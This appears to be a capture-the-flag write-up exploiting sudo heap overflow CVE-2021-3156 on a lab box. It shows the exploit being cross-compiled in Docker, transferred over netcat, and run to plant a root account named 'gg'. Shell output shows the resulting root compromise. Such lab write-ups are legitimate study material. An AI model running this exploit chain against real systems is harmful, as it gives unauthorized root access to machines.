CVE-2021-3156
PEAS has discovered that the target system is vulnerable to CVE-2021-3156
a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
Exploit
Exploit found online
tomcat@ubuntu:/dev/shm$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
tomcat@ubuntu:/dev/shm$ cc
cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of themThere is no compiler installed in the target system Opting out to remote compilation
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ docker run -it --entrypoint "/bin/bash" --name thompson ubuntu:16.04
root@e2c61b7c3ce1:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Firing up a Docker instance that matches the target system and glibc version
root@e2c61b7c3ce1:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd rootInstalling necessary packages
root@e2c61b7c3ce1:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 86 (delta 16), reused 11 (delta 11), pack-reused 68
Unpacking objects: 100% (86/86), done.
Checking connectivity... done.
root@e2c61b7c3ce1:~/CVE-2021-3156# gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl
root@e2c61b7c3ce1:~/CVE-2021-3156# cd .. ; tar -czf CVE-2021-3156.tar.gz ./CVE-2021-3156Downloading the exploit and compiling
root@e2c61b7c3ce1:~# nc 10.10.206.196 2222 < CVE-2021-3156.tar.gz
tomcat@ubuntu:/dev/shm$ nc -nlvp 2222 >> CVE-2021-3156.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.9.2.95] port 2222 [tcp/*] accepted (family 2, sport 36356)Delivery complete
Exploitation
tomcat@ubuntu:/dev/shm$ tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156Extracting the exploit package
tomcat@ubuntu:/dev/shm/CVE-2021-3156$ ./exploit_userspec.py
[...REDACTED...]
offset to first userspec: 0x370
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
to skip finding offsets next time no this machine, run:
./exploit_userspec.py 0x1230 0x60 0x370 0x0
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 1549Exploitation successful
tomcat@ubuntu:/dev/shm/CVE-2021-3156$ su gg
Password: gg
root@ubuntu:/dev/shm/CVE-2021-3156# whoami
root
root@ubuntu:/dev/shm/CVE-2021-3156# hostname
ubuntu
root@ubuntu:/dev/shm/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:a6:23:97:5f:3d brd ff:ff:ff:ff:ff:ff
inet 10.10.118.162/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a6:23ff:fe97:5f3d/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise